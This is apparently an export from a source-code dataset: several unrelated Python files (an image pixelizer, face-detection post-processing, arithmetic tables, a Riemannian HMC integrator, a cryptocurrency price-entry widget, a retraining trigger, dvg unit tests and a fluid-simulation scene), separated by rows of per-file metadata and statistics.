default_encoder_model = 'res/python/res/SavedModels/pretrained_model_encoder.h5'
default_decoder_model = 'res/python/res/SavedModels/pretrained_model_decoder.h5'
image_output_dir = "res/python/res/data/output"
parser = argparse.ArgumentParser()
parser.add_argument('--use_model', type=bool, default=True, help='Use default model?') # note: argparse's type=bool treats any non-empty string (even "False") as True
parser.add_argument("--img", help=" The relative path of the targeted image to this file.",
default= "None")
parser.add_argument("--display", help=" Display result", default = False)
parser.add_argument("--output_dir", help="The output directory.", default = None)
args = parser.parse_args()
if(args.use_model and args.img != "None"):
print("Using pretrained model.")
else:
print("No Pretrained Model Selected")
return
pixelazer = ConvolutionalAutoencoder()
# Loading Pretrained Model
pixelazer.encoder = tf.keras.models.load_model(default_encoder_model)
pixelazer.decoder = tf.keras.models.load_model(default_decoder_model)
pixelazer.compile(optimizer= "adam", loss=tf.keras.losses.MeanSquaredError())
output = pixelazer.predict(Get_Img(args.img))
if(args.display):
display_sample(output)
if args.output_dir is not None:
Save(output[0],args.output_dir)
print("Done")
exit()
if __name__ == '__main__':
main()
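# Example invocation (hypothetical input path; --display and --output_dir are optional):
#   python pixelize.py --img res/python/res/data/input/face.png --display True --output_dir res/python/res/data/output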
| 34.50495
| 100
| 0.667432
| 466
| 3,485
| 4.839056
| 0.309013
| 0.046563
| 0.051885
| 0.042129
| 0.231929
| 0.213304
| 0.155211
| 0.109091
| 0.109091
| 0.109091
| 0
| 0.025822
| 0.188809
| 3,485
| 101
| 101
| 34.504951
| 0.771843
| 0.119369
| 0
| 0.056338
| 0
| 0
| 0.133028
| 0.043906
| 0
| 0
| 0
| 0
| 0
| 1
| 0.098592
| false
| 0
| 0.112676
| 0.014085
| 0.28169
| 0.056338
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
ee4d585ac0fdab34831b9549bd00bfc84fbe7647
| 4,905
|
py
|
Python
|
model_zoo/official/cv/centerface/postprocess.py
|
Vincent34/mindspore
|
a39a60878a46e7e9cb02db788c0bca478f2fa6e5
|
[
"Apache-2.0"
] | 1
|
2021-07-03T06:52:20.000Z
|
2021-07-03T06:52:20.000Z
|
model_zoo/official/cv/centerface/postprocess.py
|
Vincent34/mindspore
|
a39a60878a46e7e9cb02db788c0bca478f2fa6e5
|
[
"Apache-2.0"
] | null | null | null |
model_zoo/official/cv/centerface/postprocess.py
|
Vincent34/mindspore
|
a39a60878a46e7e9cb02db788c0bca478f2fa6e5
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2021 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""post process for 310 inference"""
import os
import numpy as np
from src.model_utils.config import config
from dependency.centernet.src.lib.detectors.base_detector import CenterFaceDetector
from dependency.evaluate.eval import evaluation
dct_map = {'16': '16--Award_Ceremony', '26': '26--Soldier_Drilling', '29': '29--Students_Schoolkids',
'30': '30--Surgeons', '52': '52--Photographers', '59': '59--people--driving--car', '44': '44--Aerobics',
'50': '50--Celebration_Or_Party', '19': '19--Couple', '38': '38--Tennis', '37': '37--Soccer',
'48': '48--Parachutist_Paratrooper', '53': '53--Raid', '6': '6--Funeral', '40': '40--Gymnastics',
'5': '5--Car_Accident', '39': '39--Ice_Skating', '47': '47--Matador_Bullfighter', '61': '61--Street_Battle',
'56': '56--Voter', '18': '18--Concerts', '1': '1--Handshaking', '2': '2--Demonstration',
'28': '28--Sports_Fan', '4': '4--Dancing', '43': '43--Row_Boat', '49': '49--Greeting', '12': '12--Group',
'24': '24--Soldier_Firing', '33': '33--Running', '11': '11--Meeting', '36': '36--Football',
'45': '45--Balloonist', '15': '15--Stock_Market', '51': '51--Dresses', '7': '7--Cheering',
'32': '32--Worker_Laborer', '58': '58--Hockey', '35': '35--Basketball', '22': '22--Picnic',
'55': '55--Sports_Coach_Trainer', '3': '3--Riot', '23': '23--Shoppers', '34': '34--Baseball',
'8': '8--Election_Campain', '9': '9--Press_Conference', '17': '17--Ceremony', '13': '13--Interview',
'20': '20--Family_Group', '25': '25--Soldier_Patrol', '42': '42--Car_Racing', '0': '0--Parade',
'14': '14--Traffic', '41': '41--Swimming', '46': '46--Jockey', '10': '10--People_Marching',
'54': '54--Rescue', '57': '57--Angler', '31': '31--Waiter_Waitress', '27': '27--Spa', '21': '21--Festival'}
def cal_acc(result_path, label_file, meta_file, save_path):
detector = CenterFaceDetector(config, None)
if not os.path.exists(save_path):
for im_dir in dct_map.values():
out_path = os.path.join(save_path, im_dir)
if not os.path.exists(out_path):
os.makedirs(out_path)
name_list = np.load(os.path.join(meta_file, "name_list.npy"), allow_pickle=True)
meta_list = np.load(os.path.join(meta_file, "meta_list.npy"), allow_pickle=True)
for num, im_name in enumerate(name_list):
meta = meta_list[num]
output_hm = np.fromfile(os.path.join(result_path, im_name) + "_0.bin", dtype=np.float32).reshape((1, 200))
output_wh = np.fromfile(os.path.join(result_path, im_name) + "_1.bin", dtype=np.float32).reshape(
(1, 2, 208, 208))
output_off = np.fromfile(os.path.join(result_path, im_name) + "_2.bin", dtype=np.float32).reshape(
(1, 2, 208, 208))
output_kps = np.fromfile(os.path.join(result_path, im_name) + "_3.bin", dtype=np.float32).reshape(
(1, 10, 208, 208))
topk_inds = np.fromfile(os.path.join(result_path, im_name) + "_4.bin", dtype=np.int32).reshape((1, 200))
reg = output_off if config.reg_offset else None
detections = []
for scale in config.test_scales:
dets = detector.centerface_decode(output_hm, output_wh, output_kps, reg=reg, opt_k=config.K,
topk_inds=topk_inds)
dets = detector.post_process(dets, meta, scale)
detections.append(dets)
dets = detector.merge_outputs(detections)
index = im_name.split('_')[0]
im_dir = dct_map.get(index)
with open(save_path + '/' + im_dir + '/' + im_name + '.txt', 'w') as f:
f.write('{:s}\n'.format('%s/%s.jpg' % (im_dir, im_name)))
f.write('{:d}\n'.format(len(dets)))
for b in dets[1]:
x1, y1, x2, y2, s = b[0], b[1], b[2], b[3], b[4]
f.write('{:.1f} {:.1f} {:.1f} {:.1f} {:.3f}\n'.format(x1, y1, (x2 - x1 + 1), (y2 - y1 + 1), s))
print(f"no.[{num}], image_nameL {im_name}")
evaluation(save_path, label_file)
if __name__ == '__main__':
cal_acc(config.result_path, config.label_file, config.meta_file, config.save_path)
| 59.096386
| 119
| 0.589602
| 690
| 4,905
| 4.033333
| 0.447826
| 0.021559
| 0.028746
| 0.028746
| 0.158103
| 0.130075
| 0.112109
| 0.112109
| 0.091987
| 0.027309
| 0
| 0.078839
| 0.206116
| 4,905
| 82
| 120
| 59.817073
| 0.63585
| 0.136595
| 0
| 0.033898
| 0
| 0
| 0.268501
| 0.034393
| 0
| 0
| 0
| 0
| 0
| 1
| 0.016949
| false
| 0
| 0.084746
| 0
| 0.101695
| 0.016949
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
ee4ea53c9f59142caa780fc1889e82f9447f0d50
| 1,231
|
py
|
Python
|
myapp/multiplication.py
|
TomokiEmmei/kadai
|
eaf3c7430aa28ca9cc00bb0dbd219999e5ebb555
|
[
"MIT"
] | null | null | null |
myapp/multiplication.py
|
TomokiEmmei/kadai
|
eaf3c7430aa28ca9cc00bb0dbd219999e5ebb555
|
[
"MIT"
] | null | null | null |
myapp/multiplication.py
|
TomokiEmmei/kadai
|
eaf3c7430aa28ca9cc00bb0dbd219999e5ebb555
|
[
"MIT"
] | null | null | null |
"""
2018.Jan
@author: Tomoki Emmei
description: program to show multiplication and addition tables
"""
import sys #read command line argument
# Display the multiplication table
def kakezan(a,b):
Seki_tab=[[0 for i in range(a)] for j in range(b)]# array for the test
for i in range(1,b+1):
for j in range(1,a+1):
print(i*j, end=' ')
Seki_tab[i-1][j-1]=i*j #store the value
print() #new line
return Seki_tab
# Display the addition table
def tashizan(a,b):
Wa_tab=[[0 for i in range(a)] for j in range(b)]# array for the test
for i in range(1,b+1):
for j in range(1,a+1):
print(i+j, end=' ')
Wa_tab[i-1][j-1]=i+j #store the value
print() #new line
return Wa_tab
def main():
#command line argument: 'a' -> addition table, 'm' -> multiplication table
args = sys.argv[1]
if args == 'm':
#load numbers from command line
x=int(input('x: '))
y=int(input('y: '))
kakezan(x,y)
elif args == "a":
x=int(input('x: '))
y=int(input('y: '))
tashizan(x,y)
else:
print('Caution: argument is a or m') # exception handling
if __name__ == '__main__':
main()
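# Example session (user enters 3 and 2 when prompted):
#   $ python multiplication.py m
#   x: 3
#   y: 2
#   1 2 3
#   2 4 6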
| 27.355556
| 77
| 0.570268
| 201
| 1,231
| 3.422886
| 0.323383
| 0.081395
| 0.034884
| 0.063953
| 0.409884
| 0.409884
| 0.409884
| 0.409884
| 0.351744
| 0.351744
| 0
| 0.021591
| 0.285134
| 1,231
| 44
| 78
| 27.977273
| 0.760227
| 0.312754
| 0
| 0.322581
| 0
| 0
| 0.061669
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.096774
| false
| 0
| 0.032258
| 0
| 0.193548
| 0.16129
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
ee4f325d1a129d74b4f20d86d9a69e407bc823af
| 1,524
|
py
|
Python
|
iliad/integrators/states/riemannian_leapfrog_state.py
|
JamesBrofos/Iliad
|
2220e1e519f479e402072f80f4bc67e419842c4e
|
[
"MIT"
] | 1
|
2022-03-24T20:32:54.000Z
|
2022-03-24T20:32:54.000Z
|
iliad/integrators/states/riemannian_leapfrog_state.py
|
JamesBrofos/Iliad
|
2220e1e519f479e402072f80f4bc67e419842c4e
|
[
"MIT"
] | null | null | null |
iliad/integrators/states/riemannian_leapfrog_state.py
|
JamesBrofos/Iliad
|
2220e1e519f479e402072f80f4bc67e419842c4e
|
[
"MIT"
] | null | null | null |
from typing import Callable
import numpy as np
from iliad.integrators.states.lagrangian_leapfrog_state import LagrangianLeapfrogState
from iliad.integrators.fields import riemannian
from iliad.linalg import solve_psd
from odyssey.distribution import Distribution
class RiemannianLeapfrogState(LagrangianLeapfrogState):
"""The Riemannian leapfrog state uses the Fisher information matrix to provide
a position-dependent Riemannian metric. As such, computing the gradients of
the Hamiltonian requires higher derivatives of the metric, which vanish in
the Euclidean case.
"""
def __copy__(self):
state = RiemannianLeapfrogState(self.position.copy(), self.momentum.copy())
state.log_posterior = self.log_posterior.copy()
state.grad_log_posterior = self.grad_log_posterior.copy()
state.velocity = self.velocity.copy()
state.metric = self.metric.copy()
state.inv_metric = self.inv_metric.copy()
state.sqrtm_metric = self.sqrtm_metric.copy()
state.logdet_metric = self.logdet_metric.copy()
state.jac_metric = self.jac_metric.copy()
state.grad_logdet_metric = self.grad_logdet_metric.copy()
state.force = self.force.copy()
return state
def update(self, distr: Distribution):
super().update(distr)
self.velocity = riemannian.velocity(self.inv_metric, self.momentum)
self.force = riemannian.force(self.velocity, self.grad_log_posterior, self.jac_metric, self.grad_logdet_metric)
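# For context, a sketch of the Hamiltonian this state supports (standard
# Riemannian-manifold HMC, with G(q) the Fisher-information metric):
#   H(q, p) = -log pi(q) + (1/2) log det G(q) + (1/2) p^T G(q)^{-1} p
# velocity is G^{-1} p, and force gathers the extra terms from the
# position-dependent metric (jac_metric, grad_logdet_metric) that vanish in
# the Euclidean case, as the class docstring notes.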
| 41.189189
| 119
| 0.740157
| 188
| 1,524
| 5.835106
| 0.340426
| 0.082042
| 0.082042
| 0.038286
| 0.047402
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.177165
| 1,524
| 36
| 120
| 42.333333
| 0.874801
| 0.161417
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.083333
| false
| 0
| 0.25
| 0
| 0.416667
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
ee5342a6017572637126ba2afb48e284377203df
| 7,625
|
py
|
Python
|
gui/qt/openswap_priceinfo.py
|
ComputerCraftr/openswap
|
7de04aa80dab79bebe4b64483011dad70a48694c
|
[
"MIT"
] | 16
|
2018-11-05T13:19:02.000Z
|
2021-04-06T12:11:49.000Z
|
gui/qt/openswap_priceinfo.py
|
ComputerCraftr/openswap
|
7de04aa80dab79bebe4b64483011dad70a48694c
|
[
"MIT"
] | 9
|
2018-09-19T03:37:26.000Z
|
2019-04-17T21:58:27.000Z
|
gui/qt/openswap_priceinfo.py
|
ComputerCraftr/openswap
|
7de04aa80dab79bebe4b64483011dad70a48694c
|
[
"MIT"
] | 5
|
2018-11-05T13:19:02.000Z
|
2020-10-20T09:15:54.000Z
|
from functools import partial
import math
from electroncash.i18n import _
from electroncash.address import Address
import electroncash.web as web
from PyQt5.QtCore import *
from PyQt5.QtGui import *
from PyQt5.QtWidgets import *
from .util import *
from .qrtextedit import ShowQRTextEdit
from electroncash import bchmessage
from electroncash import openswap
from electroncash.util import format_satoshis_plain_nofloat, get_satoshis_nofloat
from electroncash.openswap import cryptos, crypto_list_by_bytes, crypto_list_by_str
def invert(x):
""" Because python does not allow division by zero"""
try:
return 1./x
except ZeroDivisionError:
return math.copysign(math.inf, x)
class PriceInfoBox(QGroupBox):
# how many significant figures to use in price calculations
# cryptocurrency amounts always use full precision
price_sigfigs = 6
# Dialog for creating / editing / viewing OpenSwap offers
def __init__(self, parent, editable=True):
self.parent = parent
self.editable = bool(editable)
QGroupBox.__init__(self, _("Pricing"), parent=parent)
layout = QGridLayout(self)
layout.addWidget(QLabel(_("Want")), 1, 0)
hbox = QHBoxLayout()
layout.addLayout(hbox, 1, 1)
self.want_amount_e = QLineEdit()
self.want_amount_e.textEdited.connect(self.amount_edited)
hbox.addWidget(self.want_amount_e)
self.want_crypto_cb = QComboBox()
self.want_crypto_cb.addItems(crypto_list_by_str)
hbox.addWidget(self.want_crypto_cb)
self.want_price_cb = QCheckBox(_("by price"))
self.want_price_cb.clicked.connect(partial(self.clicked_byprice, 1))
hbox.addWidget(self.want_price_cb)
if not self.editable:
self.want_price_cb.setHidden(True)
self.want_crypto_cb.setDisabled(True)
hbox.addStretch(1)
layout.addWidget(QLabel(_('Give')), 2, 0)
hbox = QHBoxLayout()
layout.addLayout(hbox, 2, 1)
self.give_amount_e = QLineEdit()
self.give_amount_e.textEdited.connect(self.amount_edited)
hbox.addWidget(self.give_amount_e)
self.give_crypto_cb = QComboBox()
self.give_crypto_cb.addItems(crypto_list_by_str)
hbox.addWidget(self.give_crypto_cb)
self.give_price_cb = QCheckBox(_("by price"))
self.give_price_cb.clicked.connect(partial(self.clicked_byprice, 2))
hbox.addWidget(self.give_price_cb)
if not self.editable:
self.give_price_cb.setHidden(True)
self.give_crypto_cb.setDisabled(True)
hbox.addStretch(1)
layout.addWidget(QLabel(_('Price')), 3,0)
vbox = QVBoxLayout()
layout.addLayout(vbox, 3, 1)
hbox = QHBoxLayout()
vbox.addLayout(hbox)
hbox.addStretch(1)
self.price1_e = QLineEdit()
self.price1_e.textEdited.connect(partial(self.price_edited,1))
hbox.addWidget(self.price1_e)
self.price1_label = QLabel()
hbox.addWidget(self.price1_label)
hbox = QHBoxLayout()
vbox.addLayout(hbox)
hbox.addStretch(1)
self.price2_e = QLineEdit()
self.price2_e.textEdited.connect(partial(self.price_edited,2))
hbox.addWidget(self.price2_e)
self.price2_label = QLabel()
hbox.addWidget(self.price2_label)
self.primaryprice = self.price1_e
self.update_cryptos()
self.update_editable()
self.update_amounts()
self.want_crypto_cb.currentIndexChanged[int].connect(self.update_cryptos)
self.give_crypto_cb.currentIndexChanged[int].connect(self.update_cryptos)
def clicked_byprice(self, i, checked):
if not checked:
pass
elif i == 1:
self.give_price_cb.setChecked(False) # make sure other is unchecked
self.price1_e.setFocus(Qt.MouseFocusReason)
elif i == 2:
self.want_price_cb.setChecked(False) # make sure other is unchecked
self.price1_e.setFocus(Qt.MouseFocusReason)
self.update_amounts()
self.update_editable()
def format_price(self, p):
return '%.*g'%(self.price_sigfigs, p)
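# e.g. with price_sigfigs = 6:
#   format_price(0.123456789) -> '0.123457'
#   format_price(12345678.0) -> '1.23457e+07'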
def amount_edited(self, s):
self.update_amounts()
def price_edited(self, n, s):
if n == 1:
self.primaryprice = self.price1_e
else:
self.primaryprice = self.price2_e
self.update_amounts()
def update_amounts(self,):
# Update the other two dependent amounts based on user-provided ones.
# This uses floats.
wbyprice = self.want_price_cb.isChecked()
gbyprice = self.give_price_cb.isChecked()
if wbyprice or gbyprice:
if self.primaryprice is self.price1_e:
try:
price = float(self.price1_e.text())
iprice = invert(price)
except:
self.price2_e.setText('')
price = None
else:
self.price2_e.setText(self.format_price(iprice))
else:
try:
iprice = float(self.price2_e.text())
price = invert(iprice)
except:
self.price1_e.setText('')
price = None
else:
self.price1_e.setText(self.format_price(price))
if wbyprice:
try:
a = price * 1e8 * float(self.give_amount_e.text())
self.want_amount_e.setText(format_satoshis_plain_nofloat(a))
except:
self.want_amount_e.setText('')
else:
try:
a = iprice * 1e8 * float(self.want_amount_e.text())
self.give_amount_e.setText(format_satoshis_plain_nofloat(a))
except:
self.give_amount_e.setText('')
else:
try:
wa = float(self.want_amount_e.text())
ga = float(self.give_amount_e.text())
except:
self.price1_e.setText('')
self.price2_e.setText('')
else:
self.price1_e.setText(self.format_price(wa*invert(ga)))
self.price2_e.setText(self.format_price(ga*invert(wa)))
def update_editable(self,):
""" Based on the state of 'by price' checkboxes, update read_only-ness
"""
if not self.editable:
self.give_amount_e.setReadOnly(True)
self.want_amount_e.setReadOnly(True)
self.price1_e.setReadOnly(True)
self.price2_e.setReadOnly(True)
elif self.give_price_cb.isChecked():
self.give_amount_e.setReadOnly(True)
self.want_amount_e.setReadOnly(False)
self.price1_e.setReadOnly(False)
self.price2_e.setReadOnly(False)
elif self.want_price_cb.isChecked():
self.give_amount_e.setReadOnly(False)
self.want_amount_e.setReadOnly(True)
self.price1_e.setReadOnly(False)
self.price2_e.setReadOnly(False)
else:
self.give_amount_e.setReadOnly(False)
self.want_amount_e.setReadOnly(False)
self.price1_e.setReadOnly(True)
self.price2_e.setReadOnly(True)
def update_cryptos(self,):
tick1 = self.want_crypto_cb.currentText()
tick2 = self.give_crypto_cb.currentText()
self.price1_label.setText(tick1 + '/' + tick2)
self.price2_label.setText(tick2 + '/' + tick1)
| 36.658654
| 83
| 0.617574
| 897
| 7,625
| 5.027871
| 0.188406
| 0.042572
| 0.041463
| 0.036585
| 0.503991
| 0.430377
| 0.368514
| 0.323725
| 0.255876
| 0.233259
| 0
| 0.014004
| 0.288262
| 7,625
| 207
| 84
| 36.835749
| 0.817026
| 0.056393
| 0
| 0.367816
| 0
| 0
| 0.005853
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.051724
| false
| 0.005747
| 0.08046
| 0.005747
| 0.16092
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
ee54b64f9bc555511d62a6158fb2e8ffda3d1cc6
| 2,906
|
py
|
Python
|
commons/triggering_training/retraining_defect_type_triggering.py
|
jibby0/service-auto-analyzer
|
79a0dbf6650693a3559b484c51e97e6fac5cc3ba
|
[
"Apache-2.0"
] | null | null | null |
commons/triggering_training/retraining_defect_type_triggering.py
|
jibby0/service-auto-analyzer
|
79a0dbf6650693a3559b484c51e97e6fac5cc3ba
|
[
"Apache-2.0"
] | null | null | null |
commons/triggering_training/retraining_defect_type_triggering.py
|
jibby0/service-auto-analyzer
|
79a0dbf6650693a3559b484c51e97e6fac5cc3ba
|
[
"Apache-2.0"
] | null | null | null |
"""
* Copyright 2019 EPAM Systems
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
"""
import logging
from commons.object_saving.object_saver import ObjectSaver
from commons.triggering_training import abstract_triggering_training
logger = logging.getLogger("analyzerApp.retraining_defect_type_triggering")
class RetrainingDefectTypeTriggering(abstract_triggering_training.AbstractTrainingTrigger):
def __init__(self, app_config, start_number=100, accumulated_difference=100):
self.object_saver = ObjectSaver(app_config)
self.start_number = start_number
self.accumulated_difference = accumulated_difference
def remove_triggering_info(self, train_info):
self.object_saver.remove_project_objects(
train_info["project_id"], ["defect_type_trigger_info"])
def get_triggering_info(self, train_info):
return self.object_saver.get_project_object(
train_info["project_id"], "defect_type_trigger_info", using_json=True)
def save_triggering_info(self, trigger_info, train_info):
self.object_saver.put_project_object(
trigger_info, train_info["project_id"],
"defect_type_trigger_info", using_json=True)
def clean_defect_type_triggering_info(self, train_info, num_logs_with_defect_types):
trigger_info = self.get_triggering_info(train_info)
trigger_info["num_logs_with_defect_types_since_training"] = 0
trigger_info["num_logs_with_defect_types"] = num_logs_with_defect_types
self.save_triggering_info(trigger_info, train_info)
def should_model_training_be_triggered(self, train_info):
trigger_info = self.get_triggering_info(train_info)
if "num_logs_with_defect_types" not in trigger_info:
trigger_info["num_logs_with_defect_types"] = 0
trigger_info["num_logs_with_defect_types"] += train_info["num_logs_with_defect_types"]
if "num_logs_with_defect_types_since_training" not in trigger_info:
trigger_info["num_logs_with_defect_types_since_training"] = 0
trigger_info["num_logs_with_defect_types_since_training"] += train_info["num_logs_with_defect_types"]
self.save_triggering_info(trigger_info, train_info)
return trigger_info["num_logs_with_defect_types"] >= self.start_number\
and trigger_info["num_logs_with_defect_types_since_training"] >= self.accumulated_difference
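# Illustrative trigger behaviour with the defaults (start_number=100,
# accumulated_difference=100): retraining fires once a project has logged at
# least 100 defect-typed logs in total AND at least 100 more since the last
# training run; clean_defect_type_triggering_info() resets the second counter.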
| 47.639344
| 109
| 0.770131
| 394
| 2,906
| 5.258883
| 0.296954
| 0.100869
| 0.074324
| 0.114865
| 0.461873
| 0.408301
| 0.395753
| 0.326737
| 0.253861
| 0.225386
| 0
| 0.006939
| 0.156917
| 2,906
| 60
| 110
| 48.433333
| 0.838776
| 0.19649
| 0
| 0.171429
| 0
| 0
| 0.22948
| 0.216588
| 0
| 0
| 0
| 0
| 0
| 1
| 0.171429
| false
| 0
| 0.085714
| 0.028571
| 0.342857
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
ee5de97647ec1a5a844d776fae68ad8d234a3b9c
| 2,790
|
py
|
Python
|
tests/test_dvg_util_funcs.py
|
tos-kamiya/dvg
|
eb2df7f4b9850543098003a07f565227cdbf11fa
|
[
"BSD-2-Clause"
] | null | null | null |
tests/test_dvg_util_funcs.py
|
tos-kamiya/dvg
|
eb2df7f4b9850543098003a07f565227cdbf11fa
|
[
"BSD-2-Clause"
] | null | null | null |
tests/test_dvg_util_funcs.py
|
tos-kamiya/dvg
|
eb2df7f4b9850543098003a07f565227cdbf11fa
|
[
"BSD-2-Clause"
] | null | null | null |
from typing import *
import unittest
import contextlib
import os
import sys
import tempfile
from dvg.dvg import prune_overlapped_paragraphs, expand_file_iter
@contextlib.contextmanager
def back_to_curdir():
curdir = os.getcwd()
try:
yield
finally:
os.chdir(curdir)
def touch(file_name: str):
with open(file_name, "w") as outp:
print("", end="", file=outp)
class DvgUtilFuncsTest(unittest.TestCase):
def test_prune_overlapped_paragraphs(self):
lines = ["a b", "c d", "e f", "b a"]
spps = [
(0.1, 4, (0, 2), lines),
(0.3, 4, (1, 3), lines),
(0.2, 4, (2, 4), lines),
]
actual = prune_overlapped_paragraphs(spps)
expected = [spps[1]]
self.assertEqual(actual, expected)
spps = [
(0.3, 4, (0, 2), lines),
(0.2, 4, (1, 3), lines),
(0.1, 4, (2, 4), lines),
]
actual = prune_overlapped_paragraphs(spps)
expected = [spps[0]]
self.assertEqual(actual, expected)
spps = [
(0.3, 4, (0, 2), lines),
(0.1, 4, (1, 3), lines),
(0.2, 4, (2, 4), lines),
]
actual = prune_overlapped_paragraphs(spps)
expected = [spps[0], spps[2]]
self.assertEqual(actual, expected)
def test_expand_file_iter(self):
with tempfile.TemporaryDirectory() as tempdir:
with back_to_curdir():
os.chdir(tempdir)
file_a = os.path.join("a")
touch(file_a)
file_b = os.path.join("b")
touch(file_b)
os.mkdir("D")
file_Dc = os.path.join("D", "c")
touch(file_Dc)
file_list = list(expand_file_iter(["a"]))
self.assertSequenceEqual(file_list, ["a"])
file_list = list(expand_file_iter(["a", "b"]))
self.assertSequenceEqual(file_list, ["a", "b"])
file_list = list(expand_file_iter(["b", "D/c"]))
self.assertSequenceEqual(file_list, ["b", "D/c"])
file_list = list(expand_file_iter(["*"]))
self.assertSequenceEqual(sorted(file_list), sorted(["a", "b"]))
file_list = list(expand_file_iter(["**"]))
self.assertSequenceEqual(sorted(file_list), sorted(["a", "b", os.path.join("D", "c")]))
sys_stdin = sys.stdin
try:
sys.stdin = ["a", "D/c"]
file_list = list(expand_file_iter(["-"]))
self.assertSequenceEqual(file_list, ["a", "D/c"])
finally:
sys.stdin = sys_stdin
if __name__ == "__main__":
unittest.main()
| 28.469388
| 103
| 0.506093
| 325
| 2,790
| 4.153846
| 0.209231
| 0.071111
| 0.082963
| 0.08
| 0.493333
| 0.408889
| 0.408889
| 0.368889
| 0.348148
| 0.348148
| 0
| 0.026805
| 0.344803
| 2,790
| 97
| 104
| 28.762887
| 0.711707
| 0
| 0
| 0.22973
| 0
| 0
| 0.020789
| 0
| 0
| 0
| 0
| 0
| 0.121622
| 1
| 0.054054
| false
| 0
| 0.094595
| 0
| 0.162162
| 0.013514
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
ee6420717483b3976c5a090488575b8372f61f62
| 5,279
|
py
|
Python
|
scenes/flip06_obstacle.py
|
spockthegray/mantaflow
|
df72cf235e14ef4f3f8fac9141b5e0a8707406b3
|
[
"Apache-2.0"
] | 158
|
2018-06-24T17:42:13.000Z
|
2022-03-12T13:29:43.000Z
|
scenes/flip06_obstacle.py
|
spockthegray/mantaflow
|
df72cf235e14ef4f3f8fac9141b5e0a8707406b3
|
[
"Apache-2.0"
] | 5
|
2018-09-05T07:30:48.000Z
|
2020-07-01T08:56:28.000Z
|
scenes/flip06_obstacle.py
|
spockthegray/mantaflow
|
df72cf235e14ef4f3f8fac9141b5e0a8707406b3
|
[
"Apache-2.0"
] | 35
|
2018-06-13T04:05:42.000Z
|
2022-03-29T16:55:24.000Z
|
#
# This FLIP example combines narrow band flip, 2nd order wall boundary conditions, and
# adaptive time stepping.
#
from manta import *
dim = 3
res = 64
#res = 124
gs = vec3(res,res,res)
if (dim==2):
gs.z=1
s = Solver(name='main', gridSize = gs, dim=dim)
narrowBand = 3
minParticles = pow(2,dim)
saveParts = False
frames = 200
# Adaptive time stepping
s.frameLength = 0.8 # length of one frame (in "world time")
s.cfl = 3.0 # maximal velocity per cell and timestep, 3 is fairly strict
s.timestep = s.frameLength
s.timestepMin = s.frameLength / 4. # time step range
s.timestepMax = s.frameLength * 4.
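# With cfl = 3.0 the solver shrinks the time step until nothing moves more
# than roughly 3 cells per step, and the result is clamped to the
# [frameLength/4, frameLength*4] range set above.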
# prepare grids and particles
flags = s.create(FlagGrid)
phi = s.create(LevelsetGrid)
phiParts = s.create(LevelsetGrid)
phiObs = s.create(LevelsetGrid)
vel = s.create(MACGrid)
velOld = s.create(MACGrid)
velParts = s.create(MACGrid)
#mapWeights= s.create(MACGrid)
pressure = s.create(RealGrid)
fractions = s.create(MACGrid)
tmpVec3 = s.create(VecGrid)
pp = s.create(BasicParticleSystem)
pVel = pp.create(PdataVec3)
mesh = s.create(Mesh)
# acceleration data for particle nbs
pindex = s.create(ParticleIndexSystem)
gpi = s.create(IntGrid)
# scene setup
bWidth=1
